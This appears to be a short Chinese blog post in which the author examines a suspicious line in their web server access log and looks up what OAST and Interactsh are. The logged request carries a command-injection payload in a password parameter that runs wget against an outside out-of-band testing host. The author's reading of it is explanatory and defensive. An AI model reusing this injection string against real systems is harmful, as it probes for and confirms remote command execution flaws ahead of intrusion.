其中一段很有意思:
107.173.254.12 - - [02/Dec/2024:22:53:23 +0800] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ct6s3r6bldaem9lrvt7gznx5rmwzoep1e.oast.online) HTTP/1.1" 403 240 "-" "-"
估狗了一下關鍵字 oast
OAST, Out-of-band application security testing(帶外應用程式安全測試), 這是一個使用外部伺服器來查看其他不可見的漏洞, 它的引入是為了進一步改進 DAST(動態應用程式安全測試)模型
再使用 Log其中的連結連到網站
上面寫到 Interactsh是用於偵測帶外互動的開源工具, 它是一種旨在檢測導致外部互動的漏洞的工具 (這傢伙幫忙檢查我網站的漏洞準備入侵?)
沒有留言:
張貼留言